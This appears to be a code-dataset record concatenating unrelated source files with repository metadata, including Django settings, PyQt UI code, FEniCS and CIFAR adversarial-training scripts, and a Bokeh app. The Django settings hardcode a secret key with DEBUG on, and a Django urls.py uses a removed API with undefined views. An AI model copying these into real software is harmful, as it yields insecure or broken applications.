pathUI = io.getUIPath(abspath(__file__), "actorWindow.ui")
uic.loadUi(pathUI, self)
# Set the text for all the bio information labels
dfBio = io.getTable("biography", actorID)
name = "Name: \n" + str(dfBio.iloc[0]["Birthname"])
self.uiName.setText(name)
icon = io.getUIPath(abspath(__file__), "rating.ico")
rating = "Overall rating: <br>" + str(th.ratingOverall(actorID))
self.uiRating.setText("<html>"+rating+" <img src='"+icon+"'></html>")
# Place of birth
place = "Place of Birth: \n" + str(dfBio.iloc[0]["Place of birth"])
self.uiPlace.setText(place)
# Date of birth
birth = "Date of Birth: \n" + str(dfBio.iloc[0]["Date of birth"])
self.uiDate.setText(birth)
if not pd.isnull(dfBio.iloc[0]["Spouse"]):
# Spouse. Also there must be a new line for each spouse
tempListSpouse = str(dfBio.iloc[0]["Spouse"]).split('|')
spouse = "Spouse: \n" + '\n'.join(tempListSpouse)
self.uiSpouse.setText(spouse)
else:
# Hide spouse label if NaN
self.uiSpouse.setVisible(False)
# Height
height = "Height: \n" + str(dfBio.iloc[0]["Height"])
self.uiHeight.setText(height)
# Set biography
self.textBiography.setText(dfBio.iloc[0]["Bio"])
self.textBiography.setReadOnly(True)
# Set profile picture
pixmap = QPixmap(io.getPicture(actorID))
pixmap = pixmap.scaled(200, 200, Qt.KeepAspectRatio, Qt.SmoothTransformation)
self.picture.setPixmap(pixmap)
# Initialize movie table
self._setupTableMovies()
self.checkTop5.stateChanged.connect(self._clickBox)
# Initialize award table
self._setupTableAwards()
# Initialize genre table
self._setupTableGenres()
# Initialize overall rating table
self._setupTableRating()
self.show()
def _setupTableAwards(self) -> None:
"""Private function to set up the award table.
"""
self.tableAwards.setModel(self._modelAwards)
self._generalTableSetup(self.tableAwards)
self.tableAwards.setColumnHidden(0, True)
def _setupTableMovies(self) -> None:
"""Private function to set up the movie table.
"""
self.tableMovies.setModel(self._modelMovies)
self._generalTableSetup(self.tableMovies)
self.tableMovies.setColumnHidden(0, True)
# hide the movie plot
self.tableMovies.setColumnHidden(8, True)
#plot = table column 8
self.moviePlot.setVisible(False)
self.moviePlot.setReadOnly(True)
# Reacts on all table selection changes
self.tableMovies.selectionModel().selectionChanged.connect(self._showPlot)
def _showPlot(self):
"""Private function to outsource the plot of a movie in a seperate widget.
Also, this function tracks the selected row and changes the plot accordingly.
If the plot is not available, the box is set to setVisible(False).
"""
# Use model
model = self.tableMovies.model()
# Get first selected row
row = self.tableMovies.selectedIndexes()[0].row()
if not pd.isnull(model._df.iloc[row]["Plot"]):
plot = model._df.iloc[row]["Plot"]
self.moviePlot.setText(plot)
self.moviePlot.setVisible(True)
else:
self.moviePlot.setVisible(False)
def _setupTableTop5(self):
"""Private function to set up the top 5 movie table.
"""
self.tableMovies.setModel(self._modelTop5)
self._generalTableSetup(self.tableMovies)
def _setupTableGenres(self):
"""Private function to set up the genre table.
"""
self.tableGenres.setModel(self._modelGenres)
self._generalTableSetup(self.tableGenres)
self.tableGenres.setColumnHidden(0, True)
def _setupTableRating(self):
"""Private function to set up the rating per year table.
"""
self.tableRating.setModel(self._modelRatings)
self._generalTableSetup(self.tableRating)
def _generalTableSetup(self, table):
"""Private function to set up the general properties of any table.
"""
table.setSelectionBehavior(table.SelectRows)
header = table.horizontalHeader()
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def _clickBox(self, state):
"""Private function to set up a checkbox.
Implemented to toggle between the movie table and the top 5 movie table.
"""
self.moviePlot.setVisible(False)
if state == QtCore.Qt.Checked:
print('Checked')
self._setupTableTop5()
else:
print('Unchecked')
self._setupTableMovies()
|
[
"yungdillaa@gmail.com"
] |
yungdillaa@gmail.com
|
38b811ade0043def5ed94ffae3ed49ec7b0d3f3f
|
dbd96086e5d882df0f1e0c3637cad7f7a4588e73
|
/django_projects/settings.py
|
896e03e9dd162c138d60203962e4919c82fe6fa5
|
[] |
no_license
|
gusguma/django-projects-model
|
c649d28b5962cb5480dee33b6cd395c0e499201c
|
0947823a18c0f5f4bfa438fe317e1616b1d454c6
|
refs/heads/master
| 2020-11-24T07:12:22.867145
| 2019-12-14T12:58:52
| 2019-12-14T12:58:52
| 228,023,585
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,204
|
py
|
"""
Django settings for django_projects project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'op2)=1w_13u#4)8dd9a&$&b@*5xsye=6=e$s5#^ivp!!-0fm^z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_pruebas.apps.DjangoPruebasConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_projects.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_projects.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"gusguma@gmail.com"
] |
gusguma@gmail.com
|
0639f377ef09cc9e3dd6e6c93f5186fac1220199
|
16e266cf50a712ed29a4097e34504aac0281e6cb
|
/Functions/venv/lib/python3.6/site-packages/_TFL/_SDG/_XML/Decl.py
|
cb6eb6e6326ae9e70cbb20696ef64a94226130af
|
[
"BSD-3-Clause"
] |
permissive
|
felix-ogutu/PYTHON-PROJECTS
|
9dd4fdcfff6957830587b64c5da3b5c3ade3a27e
|
8c1297dbda495078509d06a46f47dc7ee60b6d4e
|
refs/heads/master
| 2023-06-05T04:41:36.727376
| 2021-06-25T20:36:52
| 2021-06-25T20:36:52
| 380,348,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2004 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.SDG.XML.Decl
#
# Purpose
# Model declarations of a XML document
#
# Revision Dates
# 27-Aug-2004 (CT) Creation
# 23-Jul-2007 (CED) Activated absolute_import
# 06-Aug-2007 (CED) Future import removed again
# 26-Feb-2012 (MG) `__future__` imports added
# ««revision-date»»···
#--
from __future__ import absolute_import, division, print_function, unicode_literals
from _TFL import TFL
import _TFL._SDG._XML.Element
class _Decl_ (TFL.SDG.XML.Leaf) :
front_args = ("name", "value")
init_arg_defaults = dict \
( name = None
, value = None
)
percent_head = ""
_xml_format_body = \
"""%(elem_type)s %(percent_head)s%(name)s %(::>.value:)s"""
xml_format = "".join (("<", _xml_format_body, " >"))
_autoconvert = dict \
( name = lambda s, k, v : s._checked_xml_name (v)
)
# end class _Decl_
class Attlist (_Decl_) :
"""Model an attribute list declaration of a XML document"""
elem_type = "!ATTLIST"
front_args = ("name", )
rest_args = "value"
# end class Attlist
class Element (_Decl_) :
"""Model an element type declaration of a XML document"""
elem_type = "!ELEMENT"
# end class Element
class Entity (_Decl_) :
"""Model an entity declaration of a XML document"""
elem_type = "!ENTITY"
# end class Entity
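# Rendering sketch (an assumption -- the exact output depends on TFL.SDG's
# format engine filling xml_format): Entity(name="author", value='"C. Tanzer"')
# should come out roughly as <!ENTITY author "C. Tanzer" >.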
class Notation (_Decl_) :
"""Model a notation declaration of a XML document"""
elem_type = "!NOTATION"
# end class Notation
class Parameter_Entity (Entity) :
"""Model a parameter entity declaration of a XML document"""
percent_head = "%% "
# end class Parameter_Entity
class Unparsed_Entity (Entity) :
"""Model an unparsed entity declaration of a XML document"""
Ancestor = Entity
front_args = ("name", "value", "notation")
init_arg_defaults = dict \
( notation = None
)
xml_format = "".join \
( ("<", Ancestor._xml_format_body, " NDATA %(notation)s >")
)
_autoconvert = dict \
( notation = lambda s, k, v : s._checked_xml_name (v)
)
# end class Unparsed_Entity
Parameter = Parameter_Entity
Unparsed = Unparsed_Entity
if __name__ != "__main__" :
TFL.SDG.XML._Export_Module ()
### __END__ TFL.SDG.XML.Decl
|
[
"you@example.com"
] |
you@example.com
|
aec4c0897870b4d304099bc38e94fa771f6bef6e
|
e9b03fe553fb85f798d44607c57c43b3cb20dc50
|
/Exercícios/1177.py
|
56b4bf2b1f76f218ce22344d06ea4a2bcfd2f631
|
[
"MIT"
] |
permissive
|
aldemirneto/Exercicios-Uri
|
89cdebff9b1b02361a251dea83715d51e3ee44c3
|
f246f0d3f6f10b9039f12e1e2a50a107d0718000
|
refs/heads/main
| 2023-04-30T06:04:25.415709
| 2023-04-17T01:56:56
| 2023-04-17T01:56:56
| 337,760,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
n = int(input())
# fill 1000 positions with the values 0 .. n-1 repeated cyclically
lista = [i % n for i in range(1000)]
for i in range(1000):
    print('N[{}] = {}'.format(i, lista[i]))
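# Worked example: for input 3 the output begins
#   N[0] = 0, N[1] = 1, N[2] = 2, N[3] = 0, ...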
|
[
"56364675+aldemirneto@users.noreply.github.com"
] |
56364675+aldemirneto@users.noreply.github.com
|
7f69ec9258351f20f71e5186e75a162a42c610fd
|
b33f0a4ce4f353203b0a5f47373943273a04dfd7
|
/homework/hw11/tests/stacks.py
|
c16ae0207a65a10713321d430c5f3fe568ba26c5
|
[] |
no_license
|
yngz/cs61a
|
113c210d8c6418e54a697c2ea1036845a6727abb
|
f0e62fb8ccfc36f3eac25ffca50799990c7f8060
|
refs/heads/master
| 2020-03-27T06:22:44.368193
| 2018-11-30T10:21:02
| 2018-11-30T10:21:02
| 146,101,319
| 34
| 47
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
test = {
'name': 'stack',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
sqlite> SELECT * FROM stacks;
abraham, delano, clinton, barack|171
grover, delano, clinton, barack|173
herbert, delano, clinton, barack|176
fillmore, delano, clinton, barack|177
eisenhower, delano, clinton, barack|180
""",
'hidden': False,
'locked': False
}
],
'ordered': True,
'scored': True,
'setup': r"""
sqlite> .read hw11.sql
""",
'teardown': '',
'type': 'sqlite'
}
]
}
|
[
"yang0201@outlook.com"
] |
yang0201@outlook.com
|
5868b3f864520cc54cc9419431f75b323659fb85
|
457be849f07a095184513274650c2ea3d2e6ca34
|
/mixed_poisson/mp_train.py
|
a9312b33c542455eac156ced39286c6b07b4559f
|
[] |
no_license
|
MiroK/nn-stab-stokes
|
03f594afe277345ba43dea87b3a6a25586ddfa6c
|
2e8144c80639d3db4637009a245884ff985af347
|
refs/heads/master
| 2023-02-12T00:56:34.865307
| 2021-01-12T15:02:41
| 2021-01-12T15:02:41
| 312,362,391
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,307
|
py
|
from fenics import *
from fenics_adjoint import *
import ufl
from numpy.random import rand, seed
from mp_make_data import mixed_poisson
seed(21)
# Load observations
def train_mixed_poisson(data, W):
'''Fit data with state in W(ideally unstable)'''
# Define a neural network that will be added as a source term to the Stokes eqn
R = VectorFunctionSpace(mesh, "R", 0, dim=50)
W_1, W_2, b_1, W_3_1, W_3_2 = Function(R), Function(R), Function(R), Function(R), Function(R)
W_3 = as_vector([W_3_1, W_3_2])
R2 = VectorFunctionSpace(mesh, "R", 0, dim=2)
b_2 = Function(R2)
eps = 1e1
W_1.vector()[:] = eps*rand(R.dim())
W_2.vector()[:] = eps*rand(R.dim())
    # initialise the components directly; indexing the UFL vector W_3 yields
    # an expression without a .vector() attribute
    W_3_1.vector()[:] = eps*rand(R.dim())
    W_3_2.vector()[:] = eps*rand(R.dim())
b_1.vector()[:] = eps*rand(R.dim())
b_2.vector()[:] = eps*rand(R2.dim())
def nn(u, p, v, q):
# return inner(grad(p), grad(q)) * dx, None, None
def sigma_(vec, func=ufl.tanh):
v = [func(vec[i]) for i in range(vec.ufl_shape[0])]
return ufl.as_vector(v)
relu = lambda vec: conditional(ufl.gt(vec, 0), vec, (ufl.exp(vec) - 1))
sigma = lambda vec: sigma_(vec, func=relu)#lambda x:x)
nn_p = dot(W_3, sigma(ufl.transpose(as_vector([W_1, W_2])) * u + b_1)) + b_2
#nn_q = dot(W_3, sigma(ufl.transpose(as_vector([W_1, W_2])) * grad(q) + b_1)) + b_2
return inner(nn_p, v)*dx, inner(nn_p, nn_p)*dx, nn_p
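    # Shape sketch of the little network above, as read from the UFL: W_1 and
    # W_2 are 50-vectors stacked into a (50 x 2) first layer via
    # transpose(as_vector([W_1, W_2])); sigma is an ELU-like nonlinearity; W_3
    # maps the 50 hidden units back to R^2, shifted by the bias b_2.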
    sigma0, u0 = data.split(deepcopy=True)
# Now solve the Stokes-NN forward problem
w, reg = mixed_poisson(W, u0, nn)
sigma_nn, u_nn = w.split(deepcopy=True)
plot(sigma_nn, "out/mp_sigma_nn0.png")
plot(u_nn, "out/mp_u_nn0.png")
J = assemble((data - w)**2*dx)
print(f"J={J}")
reg = 0
    # fresh loop name (W would shadow the function-space argument) and inner(),
    # since UFL's ** is only defined for scalar operands
    for w_reg in [W_3, W_1, W_2, b_1, b_2]:
        reg += 1e4*assemble(inner(w_reg, w_reg)*dx)
J += reg
print(f"reg={reg}")
Jhat = ReducedFunctional(J, [Control(W_1), Control(b_1), Control(W_2), Control(b_2), Control(W_3_1), Control(W_3_2)])
C_w = Control(w)
set_log_level(LogLevel.ERROR)
minimize(Jhat, tol=1e-200, options={"disp": True, "gtol": 1e-12, "maxiter": 20})
print("|U - d| = ", assemble(inner(C_w.tape_value() - data, C_w.tape_value() - data)*dx)**0.5)
sigma_nn, u_nn = C_w.tape_value().split(deepcopy=True)
File("out/mp_sigma_nn.pvd") << sigma_nn
File("out/mp_u_nn.pvd") << u_nn
File("out/mp_sigma0.pvd") << sigma0
File("out/mp_u0.pvd") << u0
return nn
# --------------------------------------------------------------------
if __name__ == '__main__':
from mp_make_data import make_data
import numpy as np
mesh = RectangleMesh(Point(0.1, 0.1), Point(1.1, 1.1), 16, 16)
elm = [VectorElement('Lagrange', triangle, 1),
FiniteElement('Discontinuous Lagrange', triangle, 0)]
W = FunctionSpace(mesh, MixedElement(elm))
sigma0, u0 = make_data()
elm = [FiniteElement('Raviart-Thomas', triangle, 1),
FiniteElement('Discontinuous Lagrange', triangle, 0)]
W = FunctionSpace(mesh, MixedElement(elm))
data = Function(W)
assign(data, [interpolate(sigma0, W.sub(0).collapse()),
interpolate(u0, W.sub(1).collapse())])
nn = train_mixed_poisson(data, W)
|
[
"miroslav.kuchta@gmail.com"
] |
miroslav.kuchta@gmail.com
|
55401ba77d9170cc2836d3e8762b6cb1243bc2fc
|
8ebc40cba9e1006ab28db457416f1ab8363af92c
|
/gym/version.py
|
595cfe2965b6dc3e897f62fd4e5357385eaf3494
|
[
"MIT"
] |
permissive
|
forschumi/gym
|
790e3c371827e744f4ac05ded95af867ee0c93a8
|
8a323c9479dd64335556b86daa9061e3cf539021
|
refs/heads/master
| 2022-06-20T15:55:32.689154
| 2022-06-04T18:28:31
| 2022-06-04T18:28:31
| 87,368,392
| 0
| 0
| null | 2017-04-06T00:22:59
| 2017-04-06T00:22:59
| null |
UTF-8
|
Python
| false
| false
| 19
|
py
|
VERSION = "0.24.0"
|
[
"noreply@github.com"
] |
forschumi.noreply@github.com
|
baf0311c9c14b3c8c0ff9ed4571b0a9b021aeb20
|
357ce78eb000741b1fa742a200190ead9c87b1b3
|
/backend/urls.py
|
7fc083a58cee6dc224d0bf1a310eb091d0bcd078
|
[] |
no_license
|
LeoKnox/adventure_django2
|
40426bb1195620fb972c102aba66b501042e2d33
|
e2491e847c386c6f541497eac768ab671fcf6c04
|
refs/heads/main
| 2023-06-10T04:09:13.043850
| 2021-06-22T03:18:43
| 2021-06-22T03:18:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
"""backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from room import views
router = routers.DefaultRouter()
router.register(r'rooms', views.RoomView, 'room')
# The pre-1.10 `patterns()`/`url()` API is gone, and the 'home',
# 'room_collection' and 'room_element' views it referenced are not defined
# here; route requests through the registered DRF router instead.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include(router.urls)),
]
|
[
"noreply@github.com"
] |
LeoKnox.noreply@github.com
|
ab6a83e15be5c2a3d2a2dc9622e05554ce0ecb03
|
d6aae799e18e907fb413b715200c7832252a87e5
|
/image-generation/stylegan2-cdc/main.py
|
5f404ba2dfa1415fb4068f35840173fd9c7c6b53
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"CC-BY-NC-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
sony/nnabla-examples
|
0d0bbd5df3028996e790bcf07248fdb0932697d1
|
41f71faa6efff7774a76bbd5af3198322a90a6ab
|
refs/heads/master
| 2023-09-04T03:45:54.023899
| 2023-08-22T03:31:21
| 2023-08-22T03:31:21
| 109,625,584
| 308
| 108
|
Apache-2.0
| 2023-08-22T03:31:23
| 2017-11-05T23:30:40
|
Python
|
UTF-8
|
Python
| false
| false
| 5,169
|
py
|
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import nnabla as nn
from nnabla.ext_utils import get_extension_context
from nnabla.monitor import Monitor
from argparse import ArgumentParser
import time
from execution import *
common_utils_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', 'utils'))
sys.path.append(common_utils_path)
from neu.yaml_wrapper import read_yaml, write_yaml
from neu.comm import CommunicatorWrapper
import shutil
def make_parser():
parser = ArgumentParser(description='StyleGAN2: Nnabla implementation')
parser.add_argument('--data', type=str, default='ffhq', choices=['ffhq'],
help='Model dataset')
parser.add_argument('--dataset_path', type=str, default='',
help='Path to dataset')
    parser.add_argument('--few_shot', type=str, default='few_shot', choices=['few_shot', 'None'],
                        help='Few-shot config name ("None" disables few-shot learning)')
parser.add_argument('--weights_path', type=str, default='../results/weights',
help='Path to trained model weights')
parser.add_argument('--results_dir', type=str, default='../results/images',
help='Path to save results')
parser.add_argument('--monitor_path', '-mp', type=str, default='../results/monitor',
help='Path to save results')
# # [few-shot learning]
parser.add_argument('--pre_trained_model', type=str, default='path to pre trained model',
help='Path to trained model weights')
parser.add_argument('--extension_module', type=str, default='cudnn',
help='Device context')
parser.add_argument('--device_id', type=str, default='0',
help='Device Id')
parser.add_argument('--img_size', type=int, default=256,
help='Image size to generate')
    parser.add_argument('--batch_size', type=int, default=2,
                        help='Batch size')
parser.add_argument('--train', action='store_true', default=False,
help='Set this flag to start training')
parser.add_argument('--auto_forward', action='store_true', default=False,
help='Set this flag to execute in dynamic computation mode')
parser.add_argument('--dali', action='store_true', default=False,
help='Set this flag to use DALI data iterator')
    # type=list would split a string argument into single characters;
    # accept a list of ints via nargs instead
    parser.add_argument('--seed_1', type=int, nargs='+', default=[100, 101],
                        help='Seed values 1')
    parser.add_argument('--seed_2', type=int, nargs='+', default=[102, 103],
                        help='Seed values 2')
parser.add_argument('--test', type=str, choices=['generate', 'latent_space_interpolation', 'style_mixing', 'latent_space_projection', 'ppl'], nargs='*',
help='Set this flag for testing')
parser.add_argument('--batch_size_A', type=int, default=3,
help='Only for style mixing: Batch size for style A')
parser.add_argument('--batch_size_B', type=int, default=3,
help='Only for style mixing: Batch size for style B')
parser.add_argument('--use_tf_weights', action='store_true', default=False,
help='Use TF trained weights converted to NNabla')
parser.add_argument('--img_path', type=str,
default='',
help='Image path for latent space projection')
return parser
if __name__ == '__main__':
parser = make_parser()
args = parser.parse_args()
config = read_yaml(os.path.join('configs', f'{args.data}.yaml'))
ctx = get_extension_context(args.extension_module)
nn.set_auto_forward(args.auto_forward or args.test)
comm = CommunicatorWrapper(ctx)
nn.set_default_context(ctx)
monitor = None
if comm is not None:
if comm.rank == 0:
monitor = Monitor(args.monitor_path)
start_time = time.time()
few_shot_config = None
    if args.few_shot != 'None':  # argparse yields the string 'None' here, never the value None
few_shot_config = read_yaml(os.path.join(
'configs', args.few_shot + '.yaml'))
if args.train:
style_gan = Train(monitor, config, args, comm, few_shot_config)
if args.test:
style_gan = Evaluate(monitor, config, args, comm, few_shot_config)
if comm is not None:
if comm.rank == 0:
end_time = time.time()
training_time = (end_time-start_time)/3600
print('Total running time: {} hours'.format(training_time))
|
[
"Hua.Ding@sony.com"
] |
Hua.Ding@sony.com
|
f296a88317c734be6c382ba0af2406e75c4df68c
|
a9062f45d4dee34fff63750f63d1eedd83eb6dde
|
/gutenberg.py
|
3489a59dc7111bd0ab219e1726f013555e1173a5
|
[] |
no_license
|
rossjjennings/crypto
|
f61a881134712461ce33cbc92a5728f5e7a735af
|
630e67fde3242c5bb2331a738e55e735265a69eb
|
refs/heads/master
| 2023-03-19T21:53:02.918104
| 2023-03-11T04:09:09
| 2023-03-11T04:09:09
| 181,235,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,434
|
py
|
from collections import Counter
from glob import glob
from ruamel.yaml import YAML
yaml = YAML(typ='safe')
count = Counter()
bigrams = Counter()
initials = Counter()
finals = Counter()
for filename in glob('Gutenberg/txt/*.txt'):
with open(filename) as f:
text = f.read().replace('\n', ' ')
count += Counter(text)
bigrams += Counter(zip(text[:-1], text[1:]))
words = [word.strip(',;:-.!?()"') for word in text.split()]
initials += Counter(word[0] for word in words if len(word) > 0)
finals += Counter(word[-1] for word in words if len(word) > 0)
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
all_letters = {k: count[k] + count[k.lower()] for k in alphabet}
initial_letters = {k: initials[k] + initials[k.lower()] for k in alphabet}
final_letters = {k: finals[k] + finals[k.lower()] for k in alphabet}
letter_bigrams = {l1 + l2: bigrams[(l1, l2)]
+ bigrams[(l1, l2.lower())]
+ bigrams[(l1.lower(), l2)]
+ bigrams[(l1.lower(), l2.lower())]
for l1 in alphabet for l2 in alphabet}
with open('all_counts.yml', 'w') as f:
yaml.dump(all_letters, f)
with open('initial_counts.yml', 'w') as f:
yaml.dump(initial_letters, f)
with open('final_counts.yml', 'w') as f:
yaml.dump(final_letters, f)
with open('bigram_counts.yml', 'w') as f:
yaml.dump(letter_bigrams, f)
|
[
"rossjjennings@gmail.com"
] |
rossjjennings@gmail.com
|
0056b21b1573a9f0a6d99520739148e135749f54
|
292080e4d88bb5e5b10fd9fd744ced8ce7578a03
|
/train_cifar_jiaming.py
|
bb6f733d169fa08b21e17ac60973caf8f151004a
|
[] |
no_license
|
KirinNg/Training_Framework
|
09a1ad0dc1f2425d70cd7a6519d4474786162edc
|
607b53ef461193abf96f7f6e65bc5ca69f64a82d
|
refs/heads/master
| 2022-02-23T23:30:27.527276
| 2019-09-08T17:38:24
| 2019-09-08T17:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,278
|
py
|
from utils import config, data_stream
from utils import utils
import os
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
Cifar_train_config = config.Cifar_config()
Cifar_common_trainer = utils.Common_Framework(utils.cifar_net, Cifar_train_config)
Cifar_common_trainer.bulid_net()
Cifar_datastream = data_stream.Cifar_datastream(Cifar_common_trainer.sess, Cifar_train_config.BATCH_SIZE)
Cifar_datastream_val = data_stream.Cifar_datastream(Cifar_common_trainer.sess, Cifar_train_config.BATCH_SIZE, "val")
def StepLL_for_this_statu(x, logits, origin_label, eps=0.05):
total_class_num = tf.shape(logits)[1]
ori_class = tf.argmax(origin_label, 1, output_type=tf.int32)
    one_hot_class = tf.one_hot((ori_class + 1) % total_class_num, total_class_num)  # wrap to the next class; `//` would collapse nearly every target to class 0
cross_entropy = tf.losses.softmax_cross_entropy(one_hot_class,
logits,
label_smoothing=0.1,
weights=1.0)
x_adv = x - eps * tf.sign(tf.gradients(cross_entropy, x)[0])
x_adv = tf.clip_by_value(x_adv, -1.0, 1.0)
return tf.stop_gradient(x_adv), one_hot_class
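# Illustrative sketch (hypothetical numbers): with 10 CIFAR classes and
# ori_class == 3, the target one-hot is class 4. The input is stepped against
# the gradient of the smoothed cross-entropy toward that target,
# x - eps * sign(grad), then clipped to [-1, 1]. Note that "StepLL" usually
# targets the least-likely class; this variant targets the next class index.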
attack_op = StepLL_for_this_statu(Cifar_common_trainer.image_input_placehoder,
Cifar_common_trainer.logits,
Cifar_common_trainer.label_input_placehoder)
for e in range(Cifar_train_config.epoch):
for s in range(Cifar_train_config.step_per_epoch):
image_batch, label_batch = Cifar_datastream.get_one_batch(Cifar_common_trainer.sess)
# get attacked img
new_batch = Cifar_common_trainer.sess.run(attack_op, feed_dict=Cifar_common_trainer.get_feed(image_batch, label_batch, "att"))
_acc, cls_loss, l2 = Cifar_common_trainer.train(new_batch[0], new_batch[1])
if (s + 1) % 20 == 0:
val_image_batch, val_label_batch = Cifar_datastream_val.get_one_batch(Cifar_common_trainer.sess)
val_acc = Cifar_common_trainer.get_acc(val_image_batch, val_label_batch)
print("CLS_LOSS:{:.3f}, L2:{:.3f}, ACC:{:.4f}, EPOCH:{}, STEP:{}, val_ACC:{:.3f}".format(cls_loss, l2, _acc, e, s, val_acc))
Cifar_common_trainer.save("models/COM_Cifar.ckpt")
|
[
"kirinng0709@gmail.com"
] |
kirinng0709@gmail.com
|
cd3be5b331a4be5e57dc845d57e4f00222dda992
|
4c267509c3cc6bdce102811480d135ad817dad4d
|
/srv/main.py
|
5fa73cb43b02f578785a6074013e650c71cf4c0f
|
[
"MIT"
] |
permissive
|
varturas/PnlAITk
|
2aba552ca4d147a1167dd077537837e709148711
|
72a19f253d1abd4e35fb48da137bacd69b53f179
|
refs/heads/main
| 2023-04-07T07:47:01.282114
| 2021-04-21T20:04:57
| 2021-04-21T20:04:57
| 360,289,281
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,251
|
py
|
import sys,os
from lib.Portfolio import *
import traceback
import logging as log
import os.path,math
import html
from bokeh.layouts import row,column,layout,widgetbox
from bokeh.models import Button,ColumnDataSource,Span,Label,OpenURL,Paragraph
from bokeh.models.widgets import TextInput,DataTable,TableColumn,Div,DateFormatter,NumberFormatter,Paragraph,DatePicker
from bokeh.models.widgets import Select
from bokeh.models import Range1d, LinearAxis
from bokeh.plotting import figure,curdoc
from datetime import datetime as DT
from datetime import date, timedelta
import numpy as np
log.getLogger().setLevel(log.WARN)
#log.getLogger().setLevel(log.DEBUG)
portX = None
# page elements
ww=700
hh=70
symBox = TextInput(title="Pick a Symbol and date range", value='BTCUSD', height=hh)
todayDate = DT.today().date()
nDaysAgo = 200
datePick1=DatePicker(title='start date',min_date=date(2005,3,23),max_date=date(2022,12,31),value=todayDate-timedelta(days=nDaysAgo),height=hh)
datePick2=DatePicker(title='end date',min_date=date(2005,3,23),max_date=date(2022,12,31),value=todayDate,height=hh)
submit1 = Button(label='Submit',width=20,height=100)
